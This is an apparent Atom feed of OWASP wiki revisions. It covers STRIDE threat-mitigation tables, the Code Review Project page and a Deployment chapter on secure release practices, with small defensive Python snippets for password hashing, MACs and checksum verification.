#Cookies are configured to expire&lt;br /&gt;
#Sessions are resistant to replay attacks&lt;br /&gt;
#Secure communication channels are used to protect authentication cookies&lt;br /&gt;
#User is forced to re-authenticate when performing critical functions&lt;br /&gt;
#Sessions are expired at logout&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Auditing and Logging&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Sensitive information (e.g. passwords, PII) is not logged&lt;br /&gt;
#Access controls (e.g. ACLs) are enforced on log files to prevent unauthorized access&lt;br /&gt;
#Integrity controls (e.g. signatures) are enforced on log files to provide non-repudiation&lt;br /&gt;
#Log files provide for audit trail for sensitive operations and logging of key events&lt;br /&gt;
#Auditing and logging is enabled across the tiers on multiple servers&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
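The "passwords are stored with salted hashes" countermeasure in the authentication row above can be sketched with the standard library; the iteration count here is an illustrative value to be tuned to current guidance, not a recommendation from the guide:

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # illustrative work factor; tune to current guidance

def hash_password(password, salt=None):
    """Return (salt, digest) using PBKDF2-HMAC-SHA256 with a random salt."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, digest):
    """Constant-time comparison against the stored salted hash."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)
```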
&lt;br /&gt;
When using STRIDE, the following threat-mitigation table can be used to identify techniques that can be employed to mitigate the threats.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;STRIDE Threat &amp;amp; Mitigation Techniques List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Threat Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Mitigation Techniques&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Spoofing Identity&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authentication&lt;br /&gt;
#Protect secret data&lt;br /&gt;
#Don't store secrets&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Tampering with data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authorization&lt;br /&gt;
#Hashes&lt;br /&gt;
#MACs&lt;br /&gt;
#Digital signatures&lt;br /&gt;
#Tamper resistant protocols&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Repudiation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Digital signatures&lt;br /&gt;
#Timestamps&lt;br /&gt;
#Audit trails&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Information Disclosure&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Authorization&lt;br /&gt;
#Privacy-enhanced protocols&lt;br /&gt;
#Encryption&lt;br /&gt;
#Protect secrets&lt;br /&gt;
#Don't store secrets&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Denial of Service&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authentication&lt;br /&gt;
#Appropriate authorization&lt;br /&gt;
#Filtering&lt;br /&gt;
#Throttling&lt;br /&gt;
#Quality of service&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Elevation of privilege&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Run with least privilege&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
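The MAC entry in the tampering mitigations above can be sketched as follows; key management is deliberately simplified for illustration:

```python
import hashlib
import hmac

def sign(message, key):
    """Attach an HMAC-SHA256 tag so tampering with message is detectable."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()

def verify(message, key, tag):
    """Constant-time tag check; any modification of the message fails it."""
    return hmac.compare_digest(sign(message, key), tag)
```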
&lt;br /&gt;
Once threats and corresponding countermeasures are identified, it is possible to derive a threat profile with the following criteria:&lt;br /&gt;
&lt;br /&gt;
# '''Non mitigated threats:''' Threats which have no countermeasures and represent vulnerabilities that can be fully exploited and cause an impact &lt;br /&gt;
# '''Partially mitigated threats:''' Threats partially mitigated by one or more countermeasures which represent vulnerabilities that can only partially be exploited and cause a limited impact &lt;br /&gt;
# '''Fully mitigated threats:''' These threats have appropriate countermeasures in place and do not expose vulnerabilities or cause impact&lt;br /&gt;
&lt;br /&gt;
===Mitigation Strategies===&lt;br /&gt;
The objective of risk management is to reduce the impact that the exploitation of a threat can have on the application. This can be done by responding to a threat with a risk mitigation strategy. In general, there are five options for mitigating threats: &lt;br /&gt;
# '''Do nothing:''' for example, hoping for the best&lt;br /&gt;
# '''Informing about the risk:''' for example, warning user population about the risk&lt;br /&gt;
# '''Mitigate the risk:''' for example, by putting countermeasures in place&lt;br /&gt;
# '''Accept the risk:''' for example, after evaluating the impact of the exploitation (business impact)&lt;br /&gt;
# '''Transfer the risk:''' for example, through contractual agreements and insurance&lt;br /&gt;
&lt;br /&gt;
The decision of which strategy is most appropriate depends on the impact an exploitation of a threat can have, the likelihood of its occurrence, and the costs for transferring (i.e. costs for insurance) or avoiding (i.e. costs or losses due to redesign) it. That is, such a decision is based on the risk a threat poses to the system. Therefore, the chosen strategy does not mitigate the threat itself but the risk it poses to the system. Ultimately the overall risk has to take into account the business impact, since this is a critical factor for the business risk management strategy. One strategy could be to fix only the vulnerabilities for which the cost to fix is less than the potential business impact derived from the exploitation of the vulnerability. Another strategy could be to accept the risk when the loss of some security controls (e.g. Confidentiality, Integrity, and Availability) implies only a small degradation of the service, and not the loss of a critical business function. In some cases, transfer of the risk to another service provider might also be an option. &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Code_Review_Project&amp;diff=60010</id>
		<title>Category:OWASP Code Review Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Code_Review_Project&amp;diff=60010"/>
				<updated>2009-05-04T12:51:43Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Code review tool */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{OWASP Book|5678680}}&lt;br /&gt;
{{:Project Information:template Code Review Project}}&lt;br /&gt;
[[Category:OWASP Project]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Download]]&lt;br /&gt;
[[Category:OWASP Release Quality Document]]&lt;br /&gt;
&lt;br /&gt;
==Contents==&lt;br /&gt;
[[OWASP Code Review Guide Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
==Summer of Code 2008==&lt;br /&gt;
The Code review guide is proudly sponsored by the OWASP Summer of Code (SoC) 2008. For more information please see [[OWASP_Summer_of_Code_2008| OWASP Summer of Code 2008]].&lt;br /&gt;
&lt;br /&gt;
== Code Review Guide V1.1 Completed ==&lt;br /&gt;
The code review guide has been completed and is available here http://www.lulu.com/content/5678680 as a bound book.&lt;br /&gt;
&lt;br /&gt;
==Code review tool==&lt;br /&gt;
The following link is for the new version of Code Crawler, a code review tool that examines code for keywords discussed in the section &amp;quot;[[Crawling Code]]&amp;quot;&amp;lt;br&amp;gt;It has a new look and feel and uses MS SQL Server Express. &lt;br /&gt;
&lt;br /&gt;
You can find it here: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://www.cyphersec.com/software_archive/CodeCrawler.rar It's a lightweight tool under constant development.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Source code can be found here:&lt;br /&gt;
http://www.cyphersec.com/software_archive/OWASP_Code_Crawler.zip&lt;br /&gt;
&lt;br /&gt;
== Owasp Orizon Code review engine ==&lt;br /&gt;
&lt;br /&gt;
The Owasp Orizon Project was born in 2006 to provide a set of APIs and an open source static analysis engine for developers who want to build a code review tool.&lt;br /&gt;
&lt;br /&gt;
Owasp Orizon will evolve accordingly to implement the security checks described in the Code Review Guide.&lt;br /&gt;
A UI is also provided with the framework, giving people a standalone tool to perform code review for the security flaws listed in &amp;quot;[[The Owasp Code Review Top 9]]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Owasp Orizon main page is available here: [[:Category:OWASP_Orizon_Project]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Source code is hosted at Sourceforge.net site: http://orizon.sourceforge.net&lt;br /&gt;
&lt;br /&gt;
== Spring Of Code 2007 ==&lt;br /&gt;
The Code review guide is proudly sponsored by the OWASP Spring of Code (SpOC) 2007.&lt;br /&gt;
For more information please see [[OWASP_Spring_Of_Code_2007|Spring of Code 2007]]&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Code Review project was conceived by Eoin Keary, the OWASP Ireland Founder and Chapter Lead. We are actively seeking individuals to add new sections as new web technologies emerge. If you are interested in volunteering for the project, or have a comment, question, or suggestion, please drop me a line  mailto:eoin.keary@owasp.org&lt;br /&gt;
&lt;br /&gt;
==Join the Code Review Team==&lt;br /&gt;
&lt;br /&gt;
All of the OWASP Guides are living documents that will continue to change as the threat and security landscape changes.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We welcome everyone to join the Code Review Guide Project and help us make this document great. The best way to get started is to subscribe to the mailing list by following the link below.  Please introduce yourself and ask to see if there is anything you can help with.  We are always looking for new contributions.  If there is a topic that you’d like to research and contribute, please let us know!&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://lists.owasp.org/mailman/listinfo/owasp-codereview&lt;br /&gt;
&lt;br /&gt;
==Roadmap==&lt;br /&gt;
&lt;br /&gt;
View the [[OWASP Code Review Project Roadmap]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Deployment&amp;diff=60009</id>
		<title>Deployment</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Deployment&amp;diff=60009"/>
				<updated>2009-05-04T12:30:13Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Stub}}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Guide Table of Contents| Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
Deployment is the first and sometimes the only experience system administrators will have with your application. Customers who buy or use your application appreciate the lower costs of securely deployed software – if their system administrators do not have to spend hours or days securing your software, they are far more likely to choose your software over an insecure competitor. &lt;br /&gt;
&lt;br /&gt;
Ease of deployment is a key consideration for many highly available or highly changeable systems. Systems have a special knack of buying the farm at 3 am Monday morning before the busiest day of the year. If your application can be trivially installed at 3 am by tired and emotional system administrators, they will remember you fondly when the time comes for new software or the next version. The worst case alternative is that your customers may not be around if your software takes three days to install. &lt;br /&gt;
&lt;br /&gt;
Secure deployment is essential for high value systems. High value systems require controls in excess of basic software. This chapter guides you through packaging and deployment issues.&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that the application is deployed as easily and as securely as possible.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
* Software should have automated installers and provide automated uninstallers&lt;br /&gt;
&lt;br /&gt;
* Software should deploy using a least privilege security model&lt;br /&gt;
&lt;br /&gt;
* Software should not expose any secrets once installed&lt;br /&gt;
&lt;br /&gt;
* Documentation should not contain any default accounts, nor should the installer contain any pre-chosen or default accounts&lt;br /&gt;
&lt;br /&gt;
* Every configuration parameter must be findable&lt;br /&gt;
&lt;br /&gt;
==Release Management ==&lt;br /&gt;
&lt;br /&gt;
Release management is a formal process designed to ensure that applications are released in a tested and controlled fashion. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Is there release management in place? If so, does it cover the following?&lt;br /&gt;
&lt;br /&gt;
* Deployment testing&lt;br /&gt;
&lt;br /&gt;
* Acceptance testing&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Read software quality assurance references &lt;br /&gt;
&lt;br /&gt;
* Write deployment instructions&lt;br /&gt;
&lt;br /&gt;
* Eliminate all steps that can be automated&lt;br /&gt;
&lt;br /&gt;
* Implement a deployment acceptance test&lt;br /&gt;
&lt;br /&gt;
==Secure delivery of code ==&lt;br /&gt;
&lt;br /&gt;
Attackers have been known to send malicious code to end users, so it is vital that your users and customers can obtain your software in a secure fashion. &lt;br /&gt;
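One concrete control for secure delivery is publishing a checksum that customers verify after download; a minimal sketch with SHA-256 follows. Note this is an illustration: in practice the checksum itself should also be protected (e.g. by a digital signature), since an attacker who can alter the download can often alter a plain checksum too.

```python
import hashlib

def sha256_hex(data):
    """Compute the SHA-256 digest of the downloaded bytes."""
    return hashlib.sha256(data).hexdigest()

def matches_published(data, published_hex):
    """Compare the download against the vendor's published checksum."""
    return sha256_hex(data) == published_hex.lower()
```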
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Secure delivery of code is relatively simple to test, and even easier to rectify. &lt;br /&gt;
&lt;br /&gt;
* Pretend to be a normal customer. Obtain your software in the usual fashion.&lt;br /&gt;
&lt;br /&gt;
* Was it obtained from a retailer or other distributor in hard format? If so, does the software contain instructions on how to validate it against legitimate deliveries?&lt;br /&gt;
&lt;br /&gt;
* Does the media contain any viruses or harmful code?&lt;br /&gt;
&lt;br /&gt;
* Was it obtained from a third party download site? If so, does it contain an accurate link back to your site?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Secure &lt;br /&gt;
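One widely used safeguard, offered here as an illustrative sketch rather than a requirement of this guide, is to publish a cryptographic checksum for each release so customers can verify the file they actually downloaded. The function names below are hypothetical.&lt;br /&gt;

```python
import hashlib
import hmac

def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 and return its hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_download(path: str, published_digest: str) -> bool:
    """Compare a downloaded file against the digest published by the vendor."""
    return hmac.compare_digest(sha256_of(path), published_digest.lower())
```

Publishing the digest over a separate, authenticated channel (e.g. an HTTPS page on your own site) is what makes the comparison meaningful.&lt;br /&gt;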
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Code signing  ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
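This section is empty in the original; as a hedged illustration of the detached-signature idea behind code signing, the sketch below uses a keyed MAC from Python's standard library. Real code signing uses asymmetric keys and established tooling (e.g. GPG or Authenticode); the function names here are illustrative only.&lt;br /&gt;

```python
import hashlib
import hmac

def sign(data: bytes, key: bytes) -> str:
    """Produce a detached tag over a release artifact (MAC stand-in for a real signature)."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()

def verify(data: bytes, key: bytes, signature: str) -> bool:
    """Check a detached tag in constant time; any tampering invalidates it."""
    return hmac.compare_digest(sign(data, key), signature)
```

With asymmetric signing, only the vendor holds the signing key while anyone can verify, which is why it is preferred for distribution.&lt;br /&gt;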
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Permissions are set to least privilege ==&lt;br /&gt;
The application owner must use a different account than the system administrator; only the system administrator should have access to the root password. &lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
* Every employee can log in with the root/admin account&lt;br /&gt;
* Deployment procedures require system privileges&lt;br /&gt;
* The live application requires system privileges to start&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
* Create a dedicated user for each application&lt;br /&gt;
* Run every application with least privilege&lt;br /&gt;
* Ensure deploy and start commands do not require root/admin privileges&lt;br /&gt;
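The bullets above can be enforced with a startup guard; this is a minimal sketch, assuming a hypothetical dedicated account named "myapp".&lt;br /&gt;

```python
APP_USER = "myapp"  # hypothetical dedicated service account name

def may_start(euid: int, username: str) -> bool:
    """Refuse to start as root (euid 0) or under anything but the app's own account."""
    return euid != 0 and username == APP_USER
```

On a POSIX system this would be called at startup as, for example, may_start(os.geteuid(), getpass.getuser()).&lt;br /&gt;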
&lt;br /&gt;
==Automated packaging ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Automated deployment ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Automated removal ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==No backup or old files ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Unnecessary features are off by default ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Setup log files are clean ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==No default accounts ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
* Identify the default user accounts that are standard with the product you are using.&lt;br /&gt;
* Run periodic tests to ensure none of the accounts you identify are enabled or exist.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
* Never generate common or default credentials.&lt;br /&gt;
* Always remove any default user accounts from the server and applications prior to deployment.&lt;br /&gt;
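The periodic test described above can be automated; a minimal sketch follows, where the list of well-known default account names is illustrative and should be replaced with the defaults documented for your actual products.&lt;br /&gt;

```python
# Illustrative list only; populate from your vendors' documentation.
KNOWN_DEFAULT_ACCOUNTS = {"admin", "administrator", "guest", "test", "sa", "scott"}

def default_accounts_present(usernames):
    """Return any well-known default accounts found in the deployed user list."""
    return sorted(KNOWN_DEFAULT_ACCOUNTS & {name.lower() for name in usernames})
```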
&lt;br /&gt;
==Easter eggs ==&lt;br /&gt;
&lt;br /&gt;
Easter eggs are hidden features, usually small but sometimes substantial. Often they contain the developers' names or activate hidden advanced or developer features, but occasionally they are more like mini-applications. For the most part, they have no business function.  &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
''Figure 7 Adobe InDesign CS SVG Easter Egg''&lt;br /&gt;
&lt;br /&gt;
Easter eggs are fairly popular with developers, but they are problematic from a software engineering and legal viewpoint. Unless sufficiently designed and tested, easter eggs can cause the application to crash or misbehave. For example, Word 97 contained a pinball game and Excel 97 a small flight simulator. If these crashed with unsaved data, the application was not acting within design parameters, opening up liability. &lt;br /&gt;
&lt;br /&gt;
However, there is a case for including debug functionality, as long as it is tested, not enabled by default, and is documented within the user or administration manual. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
It is almost impossible to prevent clever developers from adding easter eggs, so look for undocumented features during code review.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Malicious software ==&lt;br /&gt;
&lt;br /&gt;
The history of software delivery is littered with examples of products shipped with something more than the users bargained for. &lt;br /&gt;
&lt;br /&gt;
Examples include:&lt;br /&gt;
&lt;br /&gt;
* Sony delivered First 4 Internet's XCP (Extended Copy Protection) rootkit on millions of audio disks, infecting at least half a million PCs. Major legal problems have ensued, and set copy prohibition technologies back at least five years&lt;br /&gt;
&lt;br /&gt;
* Microsoft through a lack of a quality assured distribution process (now resolved), distributed viruses on multiple occasions, such as the Word macro viruses Concept and Wazzu&lt;br /&gt;
&lt;br /&gt;
* Microsoft partner and premium support web sites were distributing Hotfixes with the FunLove virus in 2001&lt;br /&gt;
&lt;br /&gt;
* Hewlett-Packard had the FunLove virus on their web site, in 2000 and also 2006. Though in 2006 it was a printer that was no longer made and the Korean version of Windows 95 drivers for it, so not as big a deal as in 2000&lt;br /&gt;
&lt;br /&gt;
* Linux kernel with a backdoor was submitted to CVS tree in November 2003. It was spotted (by Larry McVoy) because it had been placed directly into CVS, not via  BitKeeper&lt;br /&gt;
&lt;br /&gt;
These examples show that distributing malicious software is highly embarrassing and extremely expensive to resolve (in Sony’s case, hundreds of millions of dollars), yet such incidents are often trivial to prevent. &lt;br /&gt;
&lt;br /&gt;
In the past, there has been much confusion over the legal status of 'spyware' (e.g. software written so an employer can monitor employees) and 'adware' (e.g. software that reports back which of a company's sites have been visited, or changes keywords in search results). Often these have been distributed with free software, with the user agreeing, via vague and deliberately verbose legal agreements, that they may be installed. Usually the adware is described as a way to 'boost' the user's shopping experience, or it is mentioned that information may be sent back to 'assist in our marketing' or that of partners. This makes it sound akin to web cookies, with little effect on system performance and no privacy issues over what is sent back. However, now that the public is becoming more aware of adware, the legal distinctions are clearer, and the IT security community is quickly learning which adware companies are prepared to play ball (making their warning notices more useful and their software less covert) and which continue to write software that violates the user's privacy and drains system resources.&lt;br /&gt;
&lt;br /&gt;
In most countries, it is now illegal to create, distribute, and use software that acts in a surreptitious and devious manner. Users will remember any vendor attempting such criminal sabotage and never buy from such vendors again. Sony is an excellent case of this; the rootkit scandal has done their reputation a great deal of damage. In Australia, such criminal acts are punishable with fines of up to $250,000 per infected computer, and up to 10 years imprisonment. Similar statutes and punishments exist in most countries. &lt;br /&gt;
&lt;br /&gt;
'''OWASP is not a source of legal advice; if you think your software flies close to the wind, you must seek competent legal opinion. Even better, do not create or distribute such software. Karma will bite you on the flip side. '''&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Does your software contain any malicious code that performs unauthorized or damaging activity, such as Sony’s rootkit? If so, remove it. &lt;br /&gt;
&lt;br /&gt;
Did you check your final software image for known:&lt;br /&gt;
&lt;br /&gt;
* viruses using at least one up to date virus scanner?&lt;br /&gt;
&lt;br /&gt;
* spyware using at least one up to date spyware scanner?&lt;br /&gt;
&lt;br /&gt;
You may also wish to check for rootkits as there are specific tools now available to do that, at least on the Windows and Unix platforms. &lt;br /&gt;
&lt;br /&gt;
Be aware that there are many free spyware scanners available which are not to be trusted. They may surreptitiously install spyware, then when they 'find' it,&lt;br /&gt;
advise that you need to buy the commercial version to be able to remove it. This situation will hopefully improve now that more antivirus and security software companies are building integrated solutions that detect spyware as well as viruses and worms. In the meantime, stick with the more well-known spyware detection software.&lt;br /&gt;
&lt;br /&gt;
Is it possible for an auditor to determine when this scan took place?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Do not create or distribute malicious software – it is illegal in most countries.&lt;br /&gt;
&lt;br /&gt;
Scan your final distribution images and media with at least one up to date virus scanner and at least one spyware checker. Document in your manual the date of this scan and the software used.&lt;br /&gt;
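To make the scan date auditable, the record can be emitted in a machine-readable form; a minimal sketch, with hypothetical field names, follows.&lt;br /&gt;

```python
import datetime
import json

def scan_record(tool: str, version: str, result: str) -> str:
    """Emit an auditable JSON record of when, and with what tool, the image was scanned."""
    return json.dumps({
        "tool": tool,
        "version": version,
        "result": result,
        "scanned_at": datetime.datetime.now(datetime.timezone.utc).isoformat(),
    })
```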
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
===Deploying applications  ===&lt;br /&gt;
&lt;br /&gt;
* (PHP) Deploying PHP web applications with Ant:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onlamp.com/pub/a/php/2005/12/20/php_ant.html&amp;lt;/u&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
* (J2EE) Deploying for the web using Ant:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/excerpt/AntTDG_chap8/index.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/excerpt/AntTDG_chap8/index1.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Apple MacOS X) Package Maker&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://developer.apple.com/tools/installerpolicy.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Many Linux distros) Redhat Package Manager (RPM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.rpm.org/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Fedora and Red Hat Enterprise Linux) Yellowdog Update Manager (YUM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://linux.duke.edu/projects/yum/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Debian, and MacOS X using Fink) Advanced Packaging Tool&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.debian.org/doc/manuals/apt-howto/index.en.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Solaris) Application Packaging Developer’s Guide&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://docs.sun.com/app/docs/doc/806-7008/&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Solaris) Blastwave is a project to encourage sharing of free software for Solaris 8, 9 and 10.  Also called Community Software for Solaris (CSW); the end-user uses the pkg-get tool to install packages.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.blastwave.org/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (FreeBSD) Ports and Packages Collection &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.freebsd.org/ports/index.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Win32, .NET, any framework where xcopy works as a deployment tool)&lt;br /&gt;
&lt;br /&gt;
Microsoft Windows Installer XML (wix), a free Windows installer creator&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://sourceforge.net/projects/wix&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Examples of bad deployment practices ===&lt;br /&gt;
&lt;br /&gt;
Sony’s rootkit settlement will cost the company more than $150 million and has seriously set back its anti-consumer copy prohibition agenda&lt;br /&gt;
&lt;br /&gt;
* Sony, Rootkits and Digital Rights Management Gone Too Far:&lt;br /&gt;
&lt;br /&gt;
